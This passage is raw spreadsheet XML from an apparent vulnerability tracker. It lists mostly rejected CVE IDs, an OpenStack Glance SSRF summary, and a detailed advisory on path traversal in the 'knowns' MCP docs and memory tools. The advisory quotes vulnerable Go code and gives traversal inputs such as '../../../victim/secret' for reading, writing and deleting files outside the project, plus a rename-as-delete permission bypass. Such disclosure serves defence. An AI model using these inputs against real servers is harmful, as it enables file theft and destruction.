      <c r="R456" s="5" t="inlineStr"/>
      <c r="S456" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability exists in the Image API (v2) of OpenStack Glance. When the show_multiple_locations configuration option is enabled in glance-api.conf, an authenticated attacker can manipulate the locations attribute of an image in the queued state by sending a crafted HTTP PATCH request</t>
        </is>
      </c>
      <c r="T456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51772</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53971</t>
        </is>
      </c>
      <c r="D457" s="5" t="inlineStr"/>
      <c r="E457" s="5" t="inlineStr"/>
      <c r="F457" s="5" t="inlineStr"/>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="inlineStr"/>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q457" s="5" t="inlineStr"/>
      <c r="R457" s="5" t="inlineStr"/>
      <c r="S457" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53971</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53972</t>
        </is>
      </c>
      <c r="D458" s="5" t="inlineStr"/>
      <c r="E458" s="5" t="inlineStr"/>
      <c r="F458" s="5" t="inlineStr"/>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="inlineStr"/>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q458" s="5" t="inlineStr"/>
      <c r="R458" s="5" t="inlineStr"/>
      <c r="S458" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53972</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53973</t>
        </is>
      </c>
      <c r="D459" s="5" t="inlineStr"/>
      <c r="E459" s="5" t="inlineStr"/>
      <c r="F459" s="5" t="inlineStr"/>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="inlineStr"/>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q459" s="5" t="inlineStr"/>
      <c r="R459" s="5" t="inlineStr"/>
      <c r="S459" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53973</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53990</t>
        </is>
      </c>
      <c r="D460" s="5" t="inlineStr"/>
      <c r="E460" s="5" t="inlineStr"/>
      <c r="F460" s="5" t="inlineStr"/>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="inlineStr"/>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q460" s="5" t="inlineStr"/>
      <c r="R460" s="5" t="inlineStr"/>
      <c r="S460" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53990</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57861</t>
        </is>
      </c>
      <c r="D461" s="5" t="inlineStr"/>
      <c r="E461" s="5" t="inlineStr"/>
      <c r="F461" s="5" t="inlineStr"/>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="inlineStr"/>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q461" s="5" t="inlineStr"/>
      <c r="R461" s="5" t="inlineStr"/>
      <c r="S461" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57861</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57864</t>
        </is>
      </c>
      <c r="D462" s="5" t="inlineStr"/>
      <c r="E462" s="5" t="inlineStr"/>
      <c r="F462" s="5" t="inlineStr"/>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="inlineStr"/>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q462" s="5" t="inlineStr"/>
      <c r="R462" s="5" t="inlineStr"/>
      <c r="S462" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57864</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60096</t>
        </is>
      </c>
      <c r="D463" s="5" t="inlineStr"/>
      <c r="E463" s="5" t="inlineStr"/>
      <c r="F463" s="5" t="inlineStr"/>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="inlineStr"/>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q463" s="5" t="inlineStr"/>
      <c r="R463" s="5" t="inlineStr"/>
      <c r="S463" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60096</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60097</t>
        </is>
      </c>
      <c r="D464" s="5" t="inlineStr"/>
      <c r="E464" s="5" t="inlineStr"/>
      <c r="F464" s="5" t="inlineStr"/>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="inlineStr"/>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q464" s="5" t="inlineStr"/>
      <c r="R464" s="5" t="inlineStr"/>
      <c r="S464" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60097</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60098</t>
        </is>
      </c>
      <c r="D465" s="5" t="inlineStr"/>
      <c r="E465" s="5" t="inlineStr"/>
      <c r="F465" s="5" t="inlineStr"/>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="inlineStr"/>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q465" s="5" t="inlineStr"/>
      <c r="R465" s="5" t="inlineStr"/>
      <c r="S465" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60098</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60099</t>
        </is>
      </c>
      <c r="D466" s="5" t="inlineStr"/>
      <c r="E466" s="5" t="inlineStr"/>
      <c r="F466" s="5" t="inlineStr"/>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="inlineStr"/>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q466" s="5" t="inlineStr"/>
      <c r="R466" s="5" t="inlineStr"/>
      <c r="S466" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60099</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60100</t>
        </is>
      </c>
      <c r="D467" s="5" t="inlineStr"/>
      <c r="E467" s="5" t="inlineStr"/>
      <c r="F467" s="5" t="inlineStr"/>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="inlineStr"/>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q467" s="5" t="inlineStr"/>
      <c r="R467" s="5" t="inlineStr"/>
      <c r="S467" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60100</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60101</t>
        </is>
      </c>
      <c r="D468" s="5" t="inlineStr"/>
      <c r="E468" s="5" t="inlineStr"/>
      <c r="F468" s="5" t="inlineStr"/>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="inlineStr"/>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q468" s="5" t="inlineStr"/>
      <c r="R468" s="5" t="inlineStr"/>
      <c r="S468" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60101</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7799</t>
        </is>
      </c>
      <c r="D469" s="5" t="inlineStr"/>
      <c r="E469" s="5" t="inlineStr"/>
      <c r="F469" s="5" t="inlineStr"/>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="inlineStr"/>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr"/>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q469" s="5" t="inlineStr"/>
      <c r="R469" s="5" t="inlineStr"/>
      <c r="S469" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7799</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7800</t>
        </is>
      </c>
      <c r="D470" s="5" t="inlineStr"/>
      <c r="E470" s="5" t="inlineStr"/>
      <c r="F470" s="5" t="inlineStr"/>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="inlineStr"/>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q470" s="5" t="inlineStr"/>
      <c r="R470" s="5" t="inlineStr"/>
      <c r="S470" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7800</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86439</t>
        </is>
      </c>
      <c r="D471" s="5" t="inlineStr"/>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr">
        <is>
          <t>npm:knowns</t>
        </is>
      </c>
      <c r="M471" s="5" t="inlineStr">
        <is>
          <t>0.30.0</t>
        </is>
      </c>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q471" s="5" t="inlineStr"/>
      <c r="R471" s="5" t="inlineStr"/>
      <c r="S471" s="5" t="inlineStr">
        <is>
          <t>## Overview
Verified. Multiple **Unrestricted Path Traversal** vulnerabilities exist in the Knowns MCP `docs` and `memory` tools, allowing arbitrary file read, write, and deletion operations outside the project sandbox. The storage layer functions (`Get`, `Create`, `Update`, `Rename`, `Delete`) in both `doc_store.go` and `memory_store.go` concatenate user-controlled paths with `filepath.Join()` without any containment validation. 
Additionally, the `docs.update` action with a `newPath` parameter performs a file deletion via `Rename()`, but is classified as `CapWrite` in the permission registry rather than `CapDelete`. This allows an attacker with a `read-write-no-delete` preset to bypass deletion restrictions and destroy arbitrary files outside the project root.
## Affected paths
| File Path | Role | Vulnerability &amp; Execution Impact |
| :--- | :--- | :--- |
| **`internal/storage/doc_store.go`** | Vulnerable Sink (Docs) | **Path Traversal in File Operations (CWE-22):** `Get()`, `Create()`, `Update()`, `Rename()`, `Delete()` join user-controlled `path` with `filepath.Join(ds.docsDir(), ...)` without validating path containment. |
| **`internal/storage/memory_store.go`** | Vulnerable Sink (Memory) | **Path Traversal in Memory Operations (CWE-22):** `GetInLayer()`, `Create()`, `Update()`, `Delete()` join user-controlled `id` with `filepath.Join(dir, models.MemoryFileName(id))` without validation. |
| **`internal/mcp/handlers/doc.go`** | Pass-Through Handler | **Unsanitized Input Propagation:** MCP handlers pass user-supplied `path`, `folder`, `newPath` directly to storage layer without sanitization. |
| **`internal/mcp/handlers/memory.go`** | Pass-Through Handler | **Unsanitized Input Propagation:** MCP handlers pass user-supplied `id` directly to storage layer without sanitization. |
| **`internal/permissions/registry.go`** | Authorization Bypass | **Capability Misclassification (CWE-863):** `docs.update` with `newPath` performs file deletion but is classified as `CapWrite`, bypassing `CapDelete` restrictions. |
## Root Cause
### Missing Path Containment in DocStore
In `internal/storage/doc_store.go`, all file operations use `filepath.Join()` to construct absolute paths without validating that the resolved path remains within `docsDir()`:
```go
// Get retrieves a doc by its relative path (without .md extension).
func (ds *DocStore) Get(path string) (*models.Doc, error) {
    path = strings.TrimPrefix(path, "/")
    path = strings.TrimSuffix(path, ".md")
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(path)+".md")
    if _, err := os.Stat(absPath); err == nil {
        // ...
        return ds.parseFile(absPath, path, folder, false, "")
    }
    // ...
}
// Create writes a new doc to .knowns/docs/{path}.md.
func (ds *DocStore) Create(doc *models.Doc) error {
    if doc.Path == "" {
        return fmt.Errorf("doc path is required")
    }
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(doc.Path)+".md")
    if err := os.MkdirAll(filepath.Dir(absPath), 0755); err != nil {
        return fmt.Errorf("create doc dir: %w", err)
    }
    return ds.writeFile(absPath, doc)
}
// Rename rewrites a doc to a new path and removes the old file.
func (ds *DocStore) Rename(oldPath string, doc *models.Doc) error {
    // ...
    oldAbsPath := filepath.Join(ds.docsDir(), filepath.FromSlash(strings.TrimSuffix(oldPath, ".md"))+".md")
    newAbsPath := filepath.Join(ds.docsDir(), filepath.FromSlash(strings.TrimSuffix(doc.Path, ".md"))+".md")
    // ...
    if err := ds.writeFile(newAbsPath, doc); err != nil {
        return err
    }
    if oldAbsPath != newAbsPath {
        // VULNERABLE: Deletes file at oldAbsPath (can be outside docsDir)
        if err := os.Remove(oldAbsPath); err != nil &amp;&amp; !os.IsNotExist(err) {
            return err
        }
    }
    return nil
}
// Delete removes a doc file.
func (ds *DocStore) Delete(path string) error {
    path = strings.TrimSuffix(path, ".md")
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(path)+".md")
    return os.Remove(absPath)
}
```
**Critical Flaws:**
- `filepath.Join` resolves `../` sequences natively
- No post-Join prefix check (e.g., `strings.HasPrefix(absPath, ds.docsDir())`)
- No rejection of absolute paths or path traversal sequences
- `Rename()` performs file deletion via `os.Remove(oldAbsPath)`, which can target files outside the docs directory
### Missing Path Containment in MemoryStore
In `internal/storage/memory_store.go`, memory operations similarly lack path validation:
```go
// GetInLayer retrieves a memory entry by ID from a specific layer only.
func (ms *MemoryStore) GetInLayer(id, layer string) (*models.MemoryEntry, error) {
    // ...
    dir, err := ms.dirForLayer(layer)
    if err != nil {
        return nil, err
    }
    // VULNERABLE: No containment check for id containing "../"
    absPath := filepath.Join(dir, models.MemoryFileName(id))
    if _, err := os.Stat(absPath); err != nil {
        return nil, fmt.Errorf("memory %q not found in %s layer", id, layer)
    }
    return ms.parseFile(absPath, layer)
}
// Create writes a new memory entry to the appropriate layer directory.
func (ms *MemoryStore) Create(entry *models.MemoryEntry) error {
    // ...
    dir, err := ms.dirForLayer(entry.Layer)
    if err != nil {
        return err
    }
    if err := os.MkdirAll(dir, 0755); err != nil {
        return fmt.Errorf("create memory dir: %w", err)
    }
    // VULNERABLE: No containment check for entry.ID containing "../"
    absPath := filepath.Join(dir, models.MemoryFileName(entry.ID))
    return atomicWrite(absPath, []byte(renderMemory(entry)))
}
// Delete removes a memory entry by ID.
func (ms *MemoryStore) Delete(id string) error {
    // ...
    filename := models.MemoryFileName(id)
    dirs := []string{ms.projectDir(), ms.globalDir()}
    for _, dir := range dirs {
        // VULNERABLE: No containment check
        absPath := filepath.Join(dir, filename)
        if _, err := os.Stat(absPath); err == nil {
            return os.Remove(absPath)
        }
    }
    return fmt.Errorf("memory %q not found", id)
}
```
### Authorization Bypass via Rename-as-Delete
In `internal/mcp/handlers/doc.go`, the `handleDocUpdate()` function accepts a `newPath` parameter that triggers a rename operation:
```go
func handleDocUpdate(getStore func() *storage.Store, req mcp.CallToolRequest) (*mcp.CallToolResult, error) {
    // ...
    if v, ok := stringArg(args, "newPath"); ok &amp;&amp; strings.TrimSpace(v) != "" {
        doc.Path = strings.Trim(strings.TrimSuffix(v, ".md"), "/")
    }
    // ...
    if oldPath != doc.Path {
        if err := store.Docs.Rename(oldPath, doc); err != nil {
            return errFailed("rename doc", err)
        }
        // ...
    }
    // ...
}
```
The `Rename()` function in `doc_store.go` performs file deletion:
```go
if oldAbsPath != newAbsPath {
    if err := os.Remove(oldAbsPath); err != nil &amp;&amp; !os.IsNotExist(err) {
        return err
    }
}
```
However, in `internal/permissions/registry.go`, `docs.update` is classified as `CapWrite`:
```go
"docs.update":  {Capability: CapWrite, Target: TargetDoc, Risk: RiskMedium},
```
This allows an attacker with a `read-write-no-delete` preset (which permits `CapWrite` but denies `CapDelete`) to delete files by using `docs.update` with a `newPath` parameter.
## Attack Vector
| Phase | Request / Action | Effect |
| :--- | :--- | :--- |
| **1. Arbitrary File Read** | `docs.get` with `path="../../../victim/secret"` | Server reads file outside project root via path traversal in `DocStore.Get()`. |
| **2. Arbitrary File Write** | `docs.create` with `folder="../../../victim"` | Server writes file outside project root via path traversal in `DocStore.Create()`. |
| **3. Arbitrary File Delete** | `docs.update` with `path="../outside/secret.md"` and `newPath="../../../victim/renamed.md"` | Server deletes file outside project root via path traversal in `DocStore.Rename()`. Bypasses `CapDelete` restriction because `docs.update` is classified as `CapWrite`. |
| **4. Memory File Read/Write** | `memory.update` with `id="x/../../../../victim/secret"` | Server reads and overwrites file outside project root via path traversal in `MemoryStore.Update()`. |
## Analysis
